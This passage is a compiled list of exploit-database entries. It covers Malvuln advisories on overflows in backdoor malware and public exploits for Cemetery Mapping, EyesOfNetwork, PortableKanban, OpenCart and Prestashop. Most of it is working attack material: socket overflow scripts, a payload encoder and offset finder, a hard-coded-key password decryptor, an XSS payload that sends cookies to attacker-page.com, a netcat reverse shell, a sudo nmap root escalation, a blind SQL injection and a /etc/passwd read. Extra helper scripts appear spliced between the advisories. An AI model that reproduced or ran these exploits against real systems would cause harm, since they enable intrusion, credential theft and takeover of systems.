movzx edx, dl
    EDX is now value CA
sub edx, dl
movzx ecx, cl                        (cl=FE)
xor eax, edx                         (EAX=30, edx=CA)
sub ecx, esi                         (ecx=FE, esi=0)
xor eax, ecx                         (eax=CE, edx=FE)
    EDX = CA
mov ecx, dword ptr ss:[esp+8]
movzx edx, byte ptr ds:[ecx]         (byte ptr [ecx]=[0019E824]=61 'a')
xor eax, edx                         (eax=30 '0', edx=61 'a') <==== HERE: the response byte is XOR'd with 0x30
cmp eax, A ('\n')                    EAX = 51 'Q'
pop esi                              (esi=0)
je backdoor.win32.ketch
test eax, eax                        (eax=51)
je backdoor.win32.ketch              (jump not taken)
mov byte ptr ds:[ecx], al            (low byte of EAX 00000051 is written back in place)
ret
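The conversion routine above is what the PoC's all-"q" script.dat has to go through. The following is an added example, not Malvuln's code, that models the transform as a plain XOR with the 0x30 key the advisory reports (treating the key as a fixed constant is an assumption taken from the advisory text), encodes a wanted in-memory byte sequence into the bytes to serve, and refuses wanted bytes of 0x0A or 0x00, since the disassembly compares the result against those two values and branches away from the store when either matches.

```python
# XOR key the advisory reports for the conversion routine called at 004014CE;
# treating it as a fixed constant is an assumption taken from the advisory text
KEY = 0x30

# Values the routine compares the transformed byte against before the store
# (cmp eax, 0A and test eax, eax). A result of 0x0A or 0x00 branches away from
# the write, so a wanted byte with either value cannot be delivered.
TERMINATORS = (0x0A, 0x00)


def ketch_transform(data: bytes, key: int = KEY) -> bytes:
    """Model of what the backdoor does to the script.dat bytes before using them."""
    return bytes(b ^ key for b in data)


def bad_input_bytes(key: int = KEY) -> set:
    """Bytes that, if served, map onto a terminator value after the XOR."""
    return {t ^ key for t in TERMINATORS}


def encode_for_ketch(wanted: bytes, key: int = KEY) -> bytes:
    """Bytes to serve so that `wanted` is what ends up in memory.

    XOR is its own inverse, so the encoding is the same operation; the check
    rejects any wanted byte the routine would treat as a terminator.
    """
    for offset, b in enumerate(wanted):
        if b in TERMINATORS:
            raise ValueError(
                f"wanted byte 0x{b:02x} at offset {offset} would need input "
                f"0x{b ^ key:02x}, which the routine treats as a terminator"
            )
    return ketch_transform(wanted, key)


def build_script_dat(length: int = 1512, wanted_byte: int = 0x41) -> bytes:
    """Filler that reaches the vulnerable copy as `wanted_byte` repeated, e.g.
    1512 x 0x41 to reproduce the 41414141 seen in the exception chain."""
    return encode_for_ketch(bytes([wanted_byte]) * length)


if __name__ == "__main__":
    with open("script.dat", "wb") as f:
        f.write(build_script_dat())
    print("bad input bytes:", sorted(hex(b) for b in bad_input_bytes()))
```

The practical consequence for a real payload is that 0x30 ("0") and 0x3A (":") cannot appear in the served file, because the malware would see them as 0x00 and 0x0A; everything else can be produced by serving its XOR-0x30 counterpart.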

Memory Dump:

0:000> !exchain
0019f1c8: ntdll!_except_handler4+0 (773d6a50)
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (774157ad)
0019f80c: Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+35020 (00435020)
0019fe24: 41414141
Invalid exception stack at 41414141

(16d0.118c): Stack buffer overflow - code c0000409 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=029044e1 edx=001a0000 esi=00000000 edi=00000002
eip=773ced3c esp=0019f110 ebp=0019f150 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400 ret 14h
0:000> .ecxr

eax=00000041 ebx=0290065c ecx=029044e1 edx=001a0000 esi=000005ef edi=02903f00
eip=004050a9 esp=0019f7c0 ebp=0019f958 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9:
004050a9 8802 mov byte ptr [edx],al ds:002b:001a0000=41
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+50a9
004050a9 8802 mov byte ptr [edx],al

EXCEPTION_RECORD: 0019f310 -- (.exr 0x19f310)
ExceptionAddress: 004050a9 (Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x000050a9)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000008
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 001a0000
Attempt to write to address 001a0000

PROCESS_NAME: Backdoor.Win32.Ketch.b.9d7be3799594a82bf7056905f501af03.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1: 00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 70

APPLICATION_VERIFIER_FLAGS: 0

CONTEXT: 0019f360 -- (.cxr 0x19f360)
eax=00000041 ebx=0290065c ecx=029044e1 edx=001a0000 esi=000005ef edi=02903f00
eip=004050a9 esp=0019f7c0 ebp=0019f958 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9:
004050a9 8802 mov byte ptr [edx],al ds:002b:001a0000=41
Resetting default scope

WRITE_ADDRESS: 001a0000

FOLLOWUP_IP:
Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+50a9
004050a9 8802 mov byte ptr [edx],al

FAULTING_THREAD: 0000118c

BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE

IP_ON_HEAP: 029032f0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER: from 029032f0 to 004050a9

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f958 029032f0 fffffffe 774453ea 773f67ea Backdoor_Win32_Ketch_b_9d7be3799594a82bf7056905f501af03+0x50a9
0019f960 774453ea 773f67ea 000005e8 000005ef 0x29032f0
0019f9c4 7674a402 00000000 00000000 00000000 ntdll!RtlDebugAllocateHeap+0x340
0019fa9c 41414141 41414141 41414141 41414141 KERNELBASE!LocalBaseRegQueryValue+0x202
0019fab0 41414141 41414141 41414141 41414141 0x41414141
0019fab4 41414141 41414141 41414141 41414141 0x41414141
0019fab8 41414141 41414141 41414141 41414141 0x41414141


Exploit/PoC:
Set up an attacker server where we control the traffic that is served as script.dat.

python3 -c "import sys; sys.stdout.write('q'*1512)" > script.dat

python3 -m http.server 80

(sys.stdout.write is used rather than print so that no trailing newline is appended and the file is exactly 1512 bytes.)



Cemetery Mapping And Information System 1.0 Cross Site Scripting


Cemetery Mapping and Information System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | 411cd927de4dc77c72949d80635f4523

# Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-10
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34

Affected parameter: "full name", "location"

Proof of concept:

1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
2. Click on "Deceased Persons"
3. Choose one of the users and click on their names to edit it
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
6. You will receive the PHPSESSID cookie in an alert. The cookie value can be sent to an attacker-controlled page by using a payload like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>

To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:

POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
Upgrade-Insecure-Requests: 1

PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=

And forward the request. The cookie values will be displayed on screen.

Backdoor.Win32.Levelone.a Remote Stack Buffer Overflow


Backdoor.Win32.Levelone.a malware suffers from a remote stack buffer overflow vulnerability.


MD5 | 42c19cf7188e3ac194716a5bf3da43a2

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6a2d09c4527cf222e4e2571b074fcc0c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Levelone.a
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on port 1500; sending a specially crafted HTTP TRACE request causes a buffer overflow and overwrites EIP with our payload. When testing, you need to delete the dropped executable in order to run the malware again: c:\>del \Windows\SysWOW64\dllvector.exe
The sample is packed with UPX, so run upx -d to unpack it.

Type: PE32
MD5: 6a2d09c4527cf222e4e2571b074fcc0c
Vuln ID: MVID-2021-0020
Dropped files: dllvector.exe
Network Access: Remote
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/10/2021

Memory Dump:

EAX : 000A139C
EBX : 0019FF70
ECX : 0040109A dllvector.0040109A
EDX : 773E9D70 ntdll.773E9D70
EBP : 000A13A4
ESP : 000A1380
ESI : FFFFFFFF
EDI : 0040801C dllvector.0040801C
EIP : 41414141


41414141 ?? ???

EXCEPTION_RECORD: 0019f7e8 -- (.exr 0x19f7e8)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME: dllvector.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000008

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
+cbf7340
41414141 ?? ???

FAILED_INSTRUCTION_ADDRESS:
+cbf7340
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT: 0019f838 -- (.cxr 0x19f838)
eax=0040b77e ebx=0040513c ecx=cbc27c7e edx=0019fbcc esi=0000663e edi=00006642
eip=41414141 esp=0019fc98 ebp=0019fcbc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
41414141 ?? ???
Resetting default scope


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=1500
JUNK="A"*7740
JUNK2="A"*7822
# Oversized request line plus an oversized Cookie header; the second JUNK sits directly after "HTTP/1."
PAYLOAD="TRACE / "+JUNK+"HTTP/1."+JUNK+"\r\n"+MALWARE_HOST+"\r\nCookie: "+JUNK2+"\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PAYLOAD.encode())  # sockets take bytes on Python 3
s.close()

print("Backdoor.Win32.Levelone.a / Remote Stack Buffer Overflow")
print("MD5: 6a2d09c4527cf222e4e2571b074fcc0c")
print("By Malvuln")


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

EyesOfNetwork 5.3 Local File Inclusion


EyesOfNetwork version 5.3 suffers from a local file inclusion vulnerability.


MD5 | 88fd5acc1e0c31de7e01d0c3cfd29bc1

# Exploit Title: EyesOfNetwork 5.3 - LFI
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

The PHP code does not restrict the tool to the ones proposed in the interface. It is possible to include arbitrary files when the "tool_list=" parameter is modified as follows:

==================================================================
POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

==================================================================


The result is the contents of /etc/passwd printed in the web page:

==================================================================

HTTP/1.1 200 OK
Date: Sat, 09 Jan 2021 01:16:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
X-Powered-By: PHP/5.4.16
Content-Length: 1529
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nagios:x:999:991::/var/spool/nagios:/sbin/nologin
influxdb:x:998:998::/var/lib/influxdb:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
polkitd:x:996:994:User for polkitd:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:994:990::/var/lib/chrony:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
cacti:x:1000:991::/home/cacti:/bin/bash
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
admin:x:1002:1000:admin:/home/admin:/bin/bash

==================================================================

PortableKanban 4.3.6578.38136 Encrypted Password Disclosure


PortableKanban version 4.3.6578.38136 suffers from a credential disclosure vulnerability via reverse engineering the executable.


MD5 | 2bf183ac639c4ae1d677e32c674e60c6

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on.

# PortableKanBan stores credentials in an encrypted format
# Reverse engineering the executable allows an attacker to extract credentials from local storage
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials

import json
import base64
import os
import sys
from des import DesKey  # python3 -m pip install des

try:
    path = sys.argv[1]
except IndexError:
    sys.exit("Supply path to PortableKanban.pk3 as argv1")


def decode(hash):
    # Base64-wrapped DES-CBC with a key and IV hard-coded in the executable
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash, initial=b"XuVUm5fR", padding=True).decode('utf-8')


with open(path) as f:
    try:
        data = json.load(f)
    except ValueError:  # Start of file sometimes contains junk - this automatically seeks valid JSON
        size = os.path.getsize(path)
        broken = True
        i = 1
        while broken:
            if i >= size:
                sys.exit("No JSON document found in {}".format(path))
            f.seek(i, 0)
            try:
                data = json.load(f)
                broken = False
            except ValueError:
                i += 1

for user in data["Users"]:
    print("{}:{}".format(user["Name"], decode(user["EncryptedPassword"])))


OpenCart 3.0.36 Cross Site Request Forgery


OpenCart version 3.0.36 account takeover cross site request forgery exploit.


MD5 | 4799d11fbee89c9aa753825d8fac8753

# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
# Date: 01-09-2021
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

#Description:
OpenCart CMS 3.0.3.6 and earlier versions are vulnerable to account takeover via CSRF on the /account/edit endpoint.

Steps to Reproduce:
1. Create two accounts: a. victim and b. attacker (the attacker account is only used to capture the request and build the CSRF PoC).
2. Log in with the attacker account, go to account/edit, change the email and intercept the request (for example in Burp Repeater), then generate a CSRF PoC from that request.
3. In the PoC, set the email to an address that is not yet registered (a second attacker-controlled email). Save the PoC as an .html file.
4. Send the PoC to the victim. When the victim opens the file, all of the account information (name, email, etc.) is changed automatically.
5. The attacker now accesses the account through the forgot-password function (the reset email arrives at the attacker's address) and retrieves all of the victim's information.


Backdoor.Win32.Levelone.b Remote Stack Buffer Overflow


Backdoor.Win32.Levelone.b malware suffers from a stack buffer overflow vulnerability.


MD5 | 483f356a3fa7919f6cd02a9cbf70cec3

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/3f82e6ddc9f5242f5af200d2fbae4ce4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Levelone.b
Vulnerability: Remote Stack Buffer Overflow
Description: The backdoor listens on port 7777. Sending two large consecutive HTTP OPTIONS requests triggers a stack buffer overflow that overwrites EIP.
Type: PE32
MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4
Vuln ID: MVID-2021-0021
Dropped files: Vector64.exe
Network Access: Remote
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/10/2021

Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(b9c.1424): Access violation - code c0000005 (first/second chance not available)
eax=000a13a4 ebx=0019ff70 ecx=0040109a edx=773e9d70 esi=ffffffff edi=0040801c
eip=41414141 esp=000a1388 ebp=000a13ac iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???

FAULTING_IP:
+d0cf3c0
41414141 ?? ???

EXCEPTION_RECORD: 0019f7f0 -- (.exr 0x19f7f0)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME: Vector64.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000008

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
+d0cf3c0
41414141 ?? ???

FAILED_INSTRUCTION_ADDRESS:
+d0cf3c0
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT: 0019f840 -- (.cxr 0x19f840)
eax=0040a371 ebx=0040513c ecx=b3be0a93 edx=0019fbd4 esi=00005231 edi=00005235
eip=41414141 esp=0019fca0 ebp=0019fcc4 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???
Resetting default scope

ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER: from 00402a5b to 41414141

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

STACK_TEXT:
0019fca0 41414141 unknown!printable+0x0
0019fca4 00402a5b vector64+0x2a5b
0019fccc 00402452 vector64+0x2452
0019fd14 0040253b vector64+0x253b
0019ff34 00402961 vector64+0x2961
0019ff3c 00401222 vector64+0x1222
0019ff88 76e38654 kernel32!BaseThreadInitThunk+0x24
0019ff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f
0019ffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: .cxr 000000000019F840 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19fca0 ; kb

POSSIBLE_INVALID_CONTROL_TRANSFER: from 00402a56 to 00403800

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: hardware

IMAGE_NAME: hardware

DEBUG_FLR_IMAGE_TIMESTAMP: 0

BUCKET_ID: CPU_CALL_ERROR

FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_hardware!Unknown



Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=7777
sz = 20000
c=1

def doit():
    global c, sz
    while True:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.settimeout(0.3)
        sz += 1000                      # 21000 bytes on the first request, 22000 on the second
        JUNK="A"*sz
        PAYLOAD="OPTIONS /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
        s.send(PAYLOAD.encode())        # sockets take bytes on Python 3
        print(sz)
        s.close()
        time.sleep(0.2)
        c+=1
        if c==3:                        # two requests sent; the second one overwrites EIP
            print("Backdoor.Win32.Levelone.b / Remote Stack Buffer Overflow")
            print("MD5: 3f82e6ddc9f5242f5af200d2fbae4ce4")
            print("By Malvuln")
            break

if __name__=="__main__":
    doit()
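Both Levelone advisories end with EIP = 41414141, which proves control of the return address but not where in the filler it lands. The script below is an added example of mine, not part of the Malvuln advisories: it replaces the run of "A"s with the standard Metasploit-style cyclic pattern (any 4-byte window occurs once within its 20280-byte period), recovers the offset from the EIP value read out of the debugger, and builds an oversized request line in the shape of the TRACE and OPTIONS requests above. The host, port and filler length are placeholders.

```python
import itertools
import socket
import string


def pattern_create(length):
    """Cyclic pattern 'Aa0Aa1Aa2...' built from uppercase/lowercase/digit triplets."""
    triplets = ("".join(t) for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    return "".join(itertools.islice(triplets, (length + 2) // 3))[:length]


def pattern_offset(eip, length=20280):
    """Offset in the pattern of the 4 bytes that ended up in EIP.

    eip may be the 32-bit value shown by the debugger (e.g. 0x61413161) or
    the 4-character string itself. x86 is little-endian, so the register
    value holds the pattern bytes in reverse order. Returns -1 if not found.
    """
    needle = eip.to_bytes(4, "little").decode("ascii") if isinstance(eip, int) else eip
    return pattern_create(length).find(needle)


def build_request(method, host, filler):
    """Oversized HTTP request line in the style of the two PoCs above."""
    return f"{method} /{filler} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def send_probe(host, port, payload, timeout=3.0):
    """Deliver one probe; the target is expected to crash afterwards."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # Placeholder target (assumption); the length mirrors the Levelone.b PoC.
    filler = pattern_create(21000)
    send_probe("x.x.x.x", 7777, build_request("OPTIONS", "x.x.x.x", filler))
    # After the crash, feed the EIP value from the debugger back in:
    print(pattern_offset(0x61413161))
```

Run it once with the pattern in place of the "A"s, read EIP from the debugger, and pass that value to pattern_offset; the result is the number of filler bytes that precede the saved return address, which is where a real return address (not 0x41414141) goes in a follow-up payload.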

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Prestashop 1.7.7.0 SQL Injection


Prestashop version 1.7.7.0 suffers from a remote blind SQL injection vulnerability.


MD5 | 30130cf8651aa6c1d5186bf919e06480

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

EyesOfNetwork 5.3 Remote Code Execution / Privilege Escalation


EyesOfNetwork version 5.3 remote code execution and privilege escalation exploit. Initial discovery of remote code execution in this version is attributed to Clement Billac in February of 2020.


MD5 | 18900120b2c6c44f3f5f2d717b504964

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

# Authenticated Remote Code Execution flaw > remote shell > PrivEsc
#
# A user with access to "/lilac/autodiscovery.php" can execute remote commands, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not validated. It is possible to append any command after an "&"; RCE is possible with a simple netcat command such as:

& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo and the NOPASSWD attribute, so it is possible to become root using the classic PrivEsc method (an NSE script that spawns a shell):

echo 'os.execute("/bin/sh")'> /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script


Anchor CMS 0.12.7 Cross Site Scripting


